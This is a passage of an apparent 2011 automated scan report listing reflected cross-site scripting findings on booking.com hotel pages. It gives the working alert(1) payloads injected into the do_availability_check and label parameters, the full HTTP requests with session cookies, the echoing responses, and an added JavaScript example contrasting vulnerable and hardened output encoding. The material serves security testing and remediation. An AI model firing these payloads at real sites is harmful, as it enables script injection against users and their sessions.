
<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ondafb4"><script>alert(1)</script>c6316da2516&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...

4.179. http://www.booking.com/hotel/us/c-boston-massachusettes.html [do_availability_check parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the do_availability_check request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d12ee</script><script>alert(1)</script>d8fe18de66e was submitted in the do_availability_check parameter. This input was echoed unmodified in the application's response. Note that the payload never has to break out of the single-quoted string: the HTML parser terminates the script element at the first </script regardless of JavaScript string state, so an inline-script sink that leaves < intact is exploitable however the quotes are handled.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where it cannot, the value must be serialized with an encoder that escapes <, > and & (as \u003c, \u003e, \u0026) in addition to quotes and backslashes; escaping quotes alone does not stop the </script> breakout shown here.
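
The same remediation applies to findings 4.181 and 4.182 (the same b_original_url sink) and, for the attribute context, to 4.180, 4.183 and 4.184. The following is an added example, not booking.com's code and not part of the scanner output: both sinks rebuilt in miniature, first with the raw concatenation that reproduces the breakouts recorded on this page, then with context-specific encoding. Function names and the surrounding markup are ours; the payloads are the ones in the requests above. The point worth seeing run is that single-quoting the value never protected the script sink, so the fix has to remove < from the serialized value (here as \u003c), not merely escape the quote.

```javascript
// Added example (not booking.com's code, not scanner output): the two sinks
// reported on this page, rebuilt small enough to run offline with node.
//   Sink A (4.179, 4.181, 4.182): single-quoted JS string inside <script>
//   Sink B (4.180, 4.183, 4.184): double-quoted HTML attribute value
// Function names and surrounding markup are ours; payloads are the page's.

// --- Sink A, vulnerable: raw concatenation into a JS string literal. ---
// The quotes do not help: the HTML parser ends the <script> element at the
// first "</script" no matter what the JavaScript string state is.
function renderScriptVulnerable(url) {
  return "<script>var b = { b_original_url : '" + url + "' };</script>";
}

// --- Sink A, hardened: JSON-serialize, then escape the characters that are
// significant to the HTML parser inside <script> (<, >, &) and the JS line
// terminators U+2028/U+2029. JavaScript reads \u003c back as '<', so the
// value is unchanged; the byte sequence "</script" can no longer appear. ---
function jsStringForScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderScriptSafe(url) {
  return "<script>var b = { b_original_url : " + jsStringForScript(url) + " };</script>";
}

// --- Sink B, vulnerable: raw concatenation into a double-quoted attribute. ---
function renderAttrVulnerable(url) {
  return '<a href="https://secure.booking.com/login.html?op=remind;go_back_url=' +
         url + '">Forgotten your password?</a>';
}

// --- Sink B, hardened: encode the five characters that can alter tag or
// attribute structure. Encoding the URL's own '&' to '&amp;' is correct HTML
// and decodes back to '&' in the browser. ---
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function htmlAttr(value) {
  return String(value).replace(/[&<>"']/g, c => ATTR_ESCAPES[c]);
}

function renderAttrSafe(url) {
  return '<a href="https://secure.booking.com/login.html?op=remind;go_back_url=' +
         htmlAttr(url) + '">Forgotten your password?</a>';
}

// Quick structural check: count "<script" and "</script" tokens. A correct
// rendering of Sink A has exactly two; a correct rendering of Sink B has none.
function countScriptTags(html) {
  return (html.match(/<\/?script/gi) || []).length;
}

// Payloads recorded in the requests above (4.179 and 4.180).
const SCRIPT_PAYLOAD_URL =
  'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804' +
  '&do_availability_check=ond12ee</script><script>alert(1)</script>d8fe18de66e&lang=en';
const ATTR_PAYLOAD_URL =
  'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804' +
  '&label=hotel-595541be8b"><script>alert(1)</script>a0af0a5308c&lang=en';

console.log('vulnerable script sink, script tokens:', countScriptTags(renderScriptVulnerable(SCRIPT_PAYLOAD_URL)));
console.log('hardened script sink, script tokens:  ', countScriptTags(renderScriptSafe(SCRIPT_PAYLOAD_URL)));
console.log('vulnerable attr sink, script tokens:  ', countScriptTags(renderAttrVulnerable(ATTR_PAYLOAD_URL)));
console.log('hardened attr sink, script tokens:    ', countScriptTags(renderAttrSafe(ATTR_PAYLOAD_URL)));
```

With the 4.179 payload, the vulnerable script rendering carries five script-tag tokens (the legitimate open and close plus the three injected), the hardened one exactly two, and JSON.parse of the hardened literal gives back the original URL, which is what the browser's JavaScript parser does with the \uXXXX escapes. For the attribute sink the hardened output contains &quot;&gt;&lt;script&gt; where the vulnerable one contains "><script>.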

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ond12ee</script><script>alert(1)</script>d8fe18de66e&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:00 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RCn8T6pC31rC6fARWEqN8Mva5xV0aRpfYUxtMLqWpePQdPd0%2FtQE93Z8tLVQG65HP%2FwKRcleAGoByyLJL6IdywGN2kUIPu5%2BzMi3R%2BvaMfyfGPzqFbVTOZ9F6GNdBC1iHPeHo%2BYKakt%2FIT%2BGSev%2Fr7RjCFW2nnfBrqFW94jOCvpWfYwcCF1uDSJTtnesHvmlIRNi0ynBmqg%2By3wHpvV%2FePbPapZrS41q7WkkSzpURMufL3zKzw4%2BIl4uh%2BkQEiFZ%2BkGHrFs9p48rryNDRkNdimQMYzFAD5EnvDzkDk%2FVdIJAHVoRmJUS%2FCzxEmLGPHMF6NxUjMZoa%2BO5RoSRXgI%2BQ%2FQgEjxZ2dkw2D7%2B5VOCA1etNpHfjm9LEuzyv52FtqjJ5H7F0ytcgDztDgpzKjzqWhEebIhZe9ZcXIqNiYH4A0niXFHuhu21uYbKgx1uTvk8t6wqW0vd%2BHX9N%2FyT%2Bz%2Fz%2FQoNCMyM7%2FdVosSUDLuUn6CzA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:01 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232259
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
inal_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=ond12ee</script><script>alert(1)</script>d8fe18de66e&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9
...[SNIP]...

4.180. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the label request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1be8b"><script>alert(1)</script>a0af0a5308c was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-595541be8b"><script>alert(1)</script>a0af0a5308c&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:43 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsLbUanppRcwLIQ8U1eiTQ2ckOYhQj9iYQWb4F3%2FiQ6Jg6l96h8o%2BmQ8yr4iEmNWw9f12aXeHeIlVBxkuf66Zwf8QuYjfkBVDYE%2BhptLS51K0wWIrfYaUGAFoftJL%2F7gZL%2Bp0yrjhGyb%2BH%2BpQ3HjeF16Gh7z9YVN%2FHm9Bqi%2FEGCAAFTxcf4%2Fe2Co%2FA0mGefMihKzP9JGq0TpHfarzQKLaOqb2GEnfF%2FcXRWxUXkR3BZaMTFjAkI3V67AnoA6P5aQVbgQreEFQt8UP%2BKzJscuNAIH4I5HejF2He3HULcTKR7XMd4dtF6RO5ZMopOpBZ63SmENzQTqAlP9L6ybTEHGFt0Wd8TnRHFa%2B98eY5f038Y9Et0%2FdMZU6NrM6ItNTUMg0fQefTAZWwhpmWgSDlF8w4sYN6yT92JXCr4Ggc5Rwu6bXPYl8642z%2B%2F1t6HpWti8r2jwBLZQ7kEg6KiESZeNlnhQMM5ffoUKXhbKQLQiFfsQA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:43 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 247280
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ank" title="Forgotten your password?" href="https://secure.booking.com/login.html?op=remind;lang=en;go_back_url=http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-595541be8b"><script>alert(1)</script>a0af0a5308c&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang
...[SNIP]...

4.181. http://www.booking.com/hotel/us/c-boston-massachusettes.html [label parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the label request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddd2</script><script>alert(1)</script>fcb6fa376ec was submitted in the label parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554fddd2</script><script>alert(1)</script>fcb6fa376ec&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:12:40 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsso8c5wdB1ecWrXWSUdBvrkvo%2B0APDzbjEyfB%2Bioa6xdydU5DErgBsYv%2BOTi7Hv181lcIFrLJyt2VMB9HKflj3Z20XJbEHjFrTD3ZBwPz2%2BQn8%2BvxbMihBH1L%2B%2BxvzOYmziRKnL2EtFKt4rrc3GdvNLmA3mIWqq6KWygDVHmD8FR66dwuhMOQjyRFDcO6HCoSeGfDAZW12nAbsU6H3El6xEskfWcc1H2pvtm2r4uu6g16fYhkCXB4bRNHJzd3qePZmYg0ztO29%2Bycc5R5Q5G3F9Bo1UdJOsaIABWolXROSOAU8nbZh7j9D%2Bo5XxwCOJckv0V0lqOFSc43MpNK%2FjPxaysiXCHo%2FhQvZz2XYy9ir4t3afd6txd5PiNqSK7tF3HF3hl2u4gbtVQfp%2FsoKXaA0CFSbsMew4b7acbX4XRxOVzPqJ%2F9Gk3LJo400KkMMwq%2Fl42uhZ4zSXMY%2FrZ5L14wSV6DZVs%2BNboAJOLq01LaQaw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:12:40 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 249437
Content-Type: text/html; charset=UTF-8


